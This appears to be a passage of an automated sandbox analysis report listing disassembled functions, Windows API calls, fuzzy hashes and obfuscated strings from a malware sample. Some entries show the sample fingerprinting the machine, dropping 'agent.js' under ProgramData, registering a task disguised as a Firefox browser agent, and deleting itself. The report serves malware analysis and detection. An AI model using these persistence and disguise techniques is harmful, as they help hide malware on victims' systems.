        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9CEE
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D00
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D12
        • Part of subcall function 00FB9C2F: _free.LIBCMT ref: 00FB9D24
      • _free.LIBCMT ref: 00FBA0FD
        • Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
        • Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA
      • _free.LIBCMT ref: 00FBA11F
      • _free.LIBCMT ref: 00FBA134
      • _free.LIBCMT ref: 00FBA13F
      • _free.LIBCMT ref: 00FBA161
      • _free.LIBCMT ref: 00FBA174
      • _free.LIBCMT ref: 00FBA182
      • _free.LIBCMT ref: 00FBA18D
      • _free.LIBCMT ref: 00FBA1C5
      • _free.LIBCMT ref: 00FBA1CC
      • _free.LIBCMT ref: 00FBA1E9
      • _free.LIBCMT ref: 00FBA201
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
      • String ID:
      • API String ID: 161543041-0
      • Opcode ID: 6a476b369ebdab3703afabdd3a9e2a7d4550d153fb5292f3ab259cfff5e13fb4
      • Instruction ID: 201115be74c974dcc4d548b9c501de3755a08fa68b2c3e95b4bf6223bb5c73f0
      • Opcode Fuzzy Hash: 6a476b369ebdab3703afabdd3a9e2a7d4550d153fb5292f3ab259cfff5e13fb4
      • Instruction Fuzzy Hash: 1F315A31A083019FEB71AA3EDC45BEAB3E9AF40320F108419E498D7251DE34AD85AF65
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traitsoperator!=
      • String ID: $($0$8$W$nwntailncasvksrgvzxnrejxcyyxomjuszgkeftopscvymwbvxagssvvhfojrxjsepuidtjncng
      • API String ID: 2802545854-1628632686
      • Opcode ID: bcda77af7c82093739e87f303b687990e94e50a8e6f6ce53580e4512b9643980
      • Instruction ID: 9a3db20c15d7c639ca84b2c4d1fcaebcfaea9f11aed0f596a1683677fa7dcd5e
      • Opcode Fuzzy Hash: bcda77af7c82093739e87f303b687990e94e50a8e6f6ce53580e4512b9643980
      • Instruction Fuzzy Hash: 43517A71D0420CDBDB54DFA9D955BEDBBB2FF04308F104219E401AB281EB799A84EF41
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • EnterCriticalSection.KERNEL32(005AA080), ref: 005A6991
      • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005A69CA
      • LeaveCriticalSection.KERNEL32(005AA080,00000000), ref: 005A69E6
      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A40
      • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A47
      • LeaveCriticalSection.KERNEL32(005AA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A5D
      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A77
      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A7E
      • LeaveCriticalSection.KERNEL32(005AA080,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6A8F
      • GetProcessHeap.KERNEL32(00000008,?,?), ref: 005A6A9B
      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005A6AA2
      • LeaveCriticalSection.KERNEL32(005AA080), ref: 005A6AB3
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
      • String ID:
      • API String ID: 2132424838-0
      • Opcode ID: 7aee7a451d9a0d89390eeaafaae79e661f8cb0cf9315708838961d593edf18ca
      • Instruction ID: 5c405c7e7458fc36be7f45a99a24bf812daea8de55b0399f0835563941db0b18
      • Opcode Fuzzy Hash: 7aee7a451d9a0d89390eeaafaae79e661f8cb0cf9315708838961d593edf18ca
      • Instruction Fuzzy Hash: F531BFB16002019FEB245FA4EC5CB6F3F65FBAB712F188029F556D62A2DB308448E791
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • _free.LIBCMT ref: 00FB8228
        • Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
        • Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA
      • _free.LIBCMT ref: 00FB8234
      • _free.LIBCMT ref: 00FB823F
      • _free.LIBCMT ref: 00FB824A
      • _free.LIBCMT ref: 00FB8255
      • _free.LIBCMT ref: 00FB8260
      • _free.LIBCMT ref: 00FB826B
      • _free.LIBCMT ref: 00FB8276
      • _free.LIBCMT ref: 00FB8281
      • _free.LIBCMT ref: 00FB828F
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: _free$ErrorFreeHeapLast
      • String ID:
      • API String ID: 776569668-0
      • Opcode ID: 41dad01a9b08e31bb04cdfa0fa62b443ae7f2d1029a640d25a2802fe9419326d
      • Instruction ID: fcc64c3a836f5782e5ca4434b15683399b1a8ba38df47ff88f65d9cd58d44762
      • Opcode Fuzzy Hash: 41dad01a9b08e31bb04cdfa0fa62b443ae7f2d1029a640d25a2802fe9419326d
      • Instruction Fuzzy Hash: E021987A904208AFCB41EF95CC81DDE7BB9BF48340B0041A5B5159B221DB35DB95DFD4
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
      • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
      • GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
      • HeapAlloc.KERNEL32(00000000), ref: 005A7069
      • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
      • RegCloseKey.ADVAPI32(80000002), ref: 005A7098
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: HeapQueryValue$AllocCloseOpenProcess
      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
      • API String ID: 2639912721-1211650757
      • Opcode ID: 14d12be6f68eea1c418a6684ca08b5882395a8f78c2df0a451fb692f99bfb584
      • Instruction ID: dc28e46728d79a3457aa0257fbc253addece3a23f2c2e4d456bc4c53f7706867
      • Opcode Fuzzy Hash: 14d12be6f68eea1c418a6684ca08b5882395a8f78c2df0a451fb692f99bfb584
      • Instruction Fuzzy Hash: FA41BE31E04619ABDB318BA9CC88ABFBFF8BF5E700F104468D941A7251E7709D45CB90
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traitsoperator!=
      • String ID: 1$H$P$jqzoubnuymkarflrgsblnyuijtzdyutycdfdhtloaqug
      • API String ID: 2802545854-3608006743
      • Opcode ID: 8020949b8d6cbe30e2805a1e0079c2aa8b516e498a075f98ee3e575e36dc0283
      • Instruction ID: b28be905bef574a5a99d2fcb6101c00cbbeb9a7615097fd2ada261a0e2b4c636
      • Opcode Fuzzy Hash: 8020949b8d6cbe30e2805a1e0079c2aa8b516e498a075f98ee3e575e36dc0283
      • Instruction Fuzzy Hash: 83412871D00248DBDB14DFA5D9A5BEDBBB0FF04714F60411DE802A7281DB78AA45EF51
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: char_traits
      • String ID: &$8$9$jgjqrkqomrozhbdhmdxtwulfach$uqip
      • API String ID: 1158913984-1523665428
      • Opcode ID: b7d39a999acade2e6dac56e559430a8d1cbe65dd2fbcf27d3a29e73b08d737e4
      • Instruction ID: 2c64f31f68297ae930d5efd9e4f555e5d7ed2ec4b23aa99a9b57f70b62a0cbfd
      • Opcode Fuzzy Hash: b7d39a999acade2e6dac56e559430a8d1cbe65dd2fbcf27d3a29e73b08d737e4
      • Instruction Fuzzy Hash: F3415671D04249CADB54EFEAC9457EDBBB0FB04318F204229D016AB288DB795A49FF41
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      • jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh, xrefs: 00FB276C
      • wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji, xrefs: 00FB2746, 00FB2781, 00FB279E
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traitsoperator!=
      • String ID: jzdwqwyumqammpueooowjjgvtxkqyegzdhdgzslgyajsclbzvvlumjujvworvqtznfkokyknwpdvh$wmralfjjyxjpaaahqtyukotytfokitzqpzktxxpjlasxwiqxteluyutwbngkpji
      • API String ID: 2802545854-3928441437
      • Opcode ID: 1dded6ecd7722815c812eff8de148c10aecec1c88d6f80a9ca5367fe23376411
      • Instruction ID: c7bab2057360059a7d81ca699a93a8dc87ad0cd58d95796c996ea0bd9a674a80
      • Opcode Fuzzy Hash: 1dded6ecd7722815c812eff8de148c10aecec1c88d6f80a9ca5367fe23376411
      • Instruction Fuzzy Hash: B8418630D0428CCADB10EFA5CD56BEEBBB4AF15708F20825DD0057B285DB785A4AEF52
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      • dzydwibcsmroxflhizzvayjcy, xrefs: 00FB2482
      • fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm, xrefs: 00FB24CF
      • cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy, xrefs: 00FB24A0
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traits
      • String ID: cmmaewimvbelpxqmmrwavslbvxckdjjxygghbhnehbeilkkwojuodtbqctfcndflgicarztuniwfnttitcozeduy$dzydwibcsmroxflhizzvayjcy$fwtzeppezjvazhyujtmjporsiuhoepcyezpzrndtdjonhkfwspgmjwijppeqbrmoricjjfsnrrohmmtnhquudfm
      • API String ID: 1455298312-3639978120
      • Opcode ID: 30d7e993ede2ee6fd0b5752ea7a9aad119105d6ff6395590adc26ac9b18e8a52
      • Instruction ID: 3b9b5819120fd6474e09a77ad77338f22e1fa0a76990677e9ea5edc76ab9c844
      • Opcode Fuzzy Hash: 30d7e993ede2ee6fd0b5752ea7a9aad119105d6ff6395590adc26ac9b18e8a52
      • Instruction Fuzzy Hash: 09217831C44B8CDACB01EFA4CD26BEEBB74BF15B44F104258E4116B292EB791B45EB81
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • type_info::operator==.LIBVCRUNTIME ref: 00FB54FA
      • ___TypeMatch.LIBVCRUNTIME ref: 00FB5608
      • _UnwindNestedFrames.LIBCMT ref: 00FB575A
      • CallUnexpected.LIBVCRUNTIME ref: 00FB5775
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
      • String ID: csm$csm$csm
      • API String ID: 2751267872-393685449
      • Opcode ID: 710fb71129eda341fc67438913af63485953aca62f30c201d64cd3104368a503
      • Instruction ID: 2e6c53c78e1844c2de40b0bf644a84655ed8ff8ebacb7e6b9c9de0d2718f448b
      • Opcode Fuzzy Hash: 710fb71129eda341fc67438913af63485953aca62f30c201d64cd3104368a503
      • Instruction Fuzzy Hash: A5B19D71D00A09DFCF24DFA6C981AEEBBB5FF04B21B144159E8016B212D739DA51EF91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InternetCrackUrlW.WININET(005AA104,00000000,00000000,0000003C), ref: 005A6535
      • GetProcessHeap.KERNEL32(00000008,00000001,005AA104), ref: 005A6557
      • HeapAlloc.KERNEL32(00000000), ref: 005A655A
      • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 005A65C9
      • HeapAlloc.KERNEL32(00000000), ref: 005A65CC
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$AllocProcess$CrackInternet
      • String ID: (gZ$<
      • API String ID: 2637570027-785279525
      • Opcode ID: 382c6089edc744a79a851d26c79510e3a84bf72c58254c9a7a9da7383307ebca
      • Instruction ID: 8e1afeb90521675c1556d89c9ecfb72b1b589eca65d797b04f456af14b271c0e
      • Opcode Fuzzy Hash: 382c6089edc744a79a851d26c79510e3a84bf72c58254c9a7a9da7383307ebca
      • Instruction Fuzzy Hash: 8751BF74A0130A8FDB24CF68D484BAEBBB4FF5A304F2880ADD455DB642EB71D9068B50
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • _ValidateLocalCookies.LIBCMT ref: 00FB4D87
      • ___except_validate_context_record.LIBVCRUNTIME ref: 00FB4D8F
      • _ValidateLocalCookies.LIBCMT ref: 00FB4E18
      • __IsNonwritableInCurrentImage.LIBCMT ref: 00FB4E43
      • _ValidateLocalCookies.LIBCMT ref: 00FB4E98
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
      • String ID: csm
      • API String ID: 1170836740-1018135373
      • Opcode ID: e1bb5926d2bdea1d9e9a06d091be0c366c81ef0e22fcd934fe9077982a50bf27
      • Instruction ID: 7f9d1902d157dcc59614c87b186649f8404218029644210d0b606079ab7102dc
      • Opcode Fuzzy Hash: e1bb5926d2bdea1d9e9a06d091be0c366c81ef0e22fcd934fe9077982a50bf27
      • Instruction Fuzzy Hash: 5E41AD34E002099BCF10EF6ACD81ADEBBA5BF49324F148059E8159B393C735E915EF90
      Uniqueness

      Uniqueness Score: -1.00%

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID:
      • String ID: api-ms-$ext-ms-
      • API String ID: 0-537541572
      • Opcode ID: 05a01afc873c6dd89fe5049b40b651c81fa9d680ae2d2d1a3a8eb63ed288401a
      • Instruction ID: 207b6f051b82f31f354995d0e9ea402bef67dbc2716b7dd30ce1f0524f6419ad
      • Opcode Fuzzy Hash: 05a01afc873c6dd89fe5049b40b651c81fa9d680ae2d2d1a3a8eb63ed288401a
      • Instruction Fuzzy Hash: 2221DB32E41324EBDB31DB66DD49FEA36589B42770B200511ED0AB71E1E6B0DD00BDE2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: task$char_traitsoperator!=
      • String ID: ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
      • API String ID: 2802545854-2962047866
      • Opcode ID: 26b0393c354cec47c24d3e6f4fd563483f1265cd2ab7c2f4a6a735921f27cb36
      • Instruction ID: c668b72f1da896dc7bb091f46d4e179aabd6d4ac995f63809a12a4ebe2e6095a
      • Opcode Fuzzy Hash: 26b0393c354cec47c24d3e6f4fd563483f1265cd2ab7c2f4a6a735921f27cb36
      • Instruction Fuzzy Hash: AE312B70D44658DAEB20EFA5CD52BDEBBB0AF04744F10419DE005B7282DB786B89EF61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00FB9D96: _free.LIBCMT ref: 00FB9DBB
      • _free.LIBCMT ref: 00FB9E1C
        • Part of subcall function 00FB7FB2: HeapFree.KERNEL32(00000000,00000000,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?), ref: 00FB7FC8
        • Part of subcall function 00FB7FB2: GetLastError.KERNEL32(?,?,00FB9DC0,?,00000000,?,?,?,00FB9DE7,?,00000007,?,?,00FBA25B,?,?), ref: 00FB7FDA
      • _free.LIBCMT ref: 00FB9E27
      • _free.LIBCMT ref: 00FB9E32
      • _free.LIBCMT ref: 00FB9E86
      • _free.LIBCMT ref: 00FB9E91
      • _free.LIBCMT ref: 00FB9E9C
      • _free.LIBCMT ref: 00FB9EA7
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: _free$ErrorFreeHeapLast
      • String ID:
      • API String ID: 776569668-0
      • Opcode ID: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
      • Instruction ID: 79f6eba5b63f688a5e9b5b4fcb5726e5628765c24bd9a3451c709b723740bb74
      • Opcode Fuzzy Hash: f8652940eed608665d87997f49d8a726addb3db1c042498b6f01942da26be76f
      • Instruction Fuzzy Hash: FA118131948B04AAD630BBB3CC07FDBB79D5F49700F804814B3D966152DABDB5456FA0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • ExpandEnvironmentStringsW.KERNEL32(%ProgramData%,?,00000104), ref: 005A723A
      • PathCombineW.SHLWAPI(?,?,agent.js), ref: 005A7253
        • Part of subcall function 005A6AC0: VariantInit.OLEAUT32(?), ref: 005A6AD7
        • Part of subcall function 005A6AC0: CoCreateInstance.OLE32(005A1020,00000000,00000001,005A1000,?), ref: 005A6AF4
        • Part of subcall function 005A6AC0: SysAllocString.OLEAUT32(\Mozilla), ref: 005A6B34
        • Part of subcall function 005A6AC0: SysFreeString.OLEAUT32(?), ref: 005A6B6B
        • Part of subcall function 005A6AC0: SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 005A6B78
        • Part of subcall function 005A6AC0: SysFreeString.OLEAUT32(00000000), ref: 005A6B8F
        • Part of subcall function 005A9020: GetFileAttributesW.KERNEL32(?,005A7269), ref: 005A9021
      • DeleteFileW.KERNEL32(?), ref: 005A7274
      • ExitProcess.KERNEL32 ref: 005A727C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: String$AllocFileFree$AttributesCombineCreateDeleteEnvironmentExitExpandInitInstancePathProcessStringsVariant
      • String ID: %ProgramData%$agent.js
      • API String ID: 1026123424-2175136953
      • Opcode ID: a98734bedd6e61e47adbd2fbbf2c43f43a423978717ac2e63901a00d968a2277
      • Instruction ID: 48edd20f91a3b410bfd0e902c88a9e02a196ca4308bfc873416e6a38d89f8a67
      • Opcode Fuzzy Hash: a98734bedd6e61e47adbd2fbbf2c43f43a423978717ac2e63901a00d968a2277
      • Instruction Fuzzy Hash: 97F0307550021C9BDB10EBA0DC4DBDE7B7CBB06301F0441A0B765920A2EBB05AC9CBA4
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00FBC040
      • __fassign.LIBCMT ref: 00FBC225
      • __fassign.LIBCMT ref: 00FBC242
      • WriteFile.KERNEL32(?,00FBAD05,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FBC28A
      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FBC2CA
      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FBC372
      Memory Dump Source
      • Source File: 00000000.00000002.2028084855.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
      • Associated: 00000000.00000002.2028070861.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028104802.0000000000FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028122229.0000000000FC8000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2028137111.0000000000FCA000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_fb0000_SecuriteInfo.jbxd
      Similarity
      • API ID: FileWrite__fassign$ConsoleErrorLastOutput
      • String ID:
      • API String ID: 1735259414-0
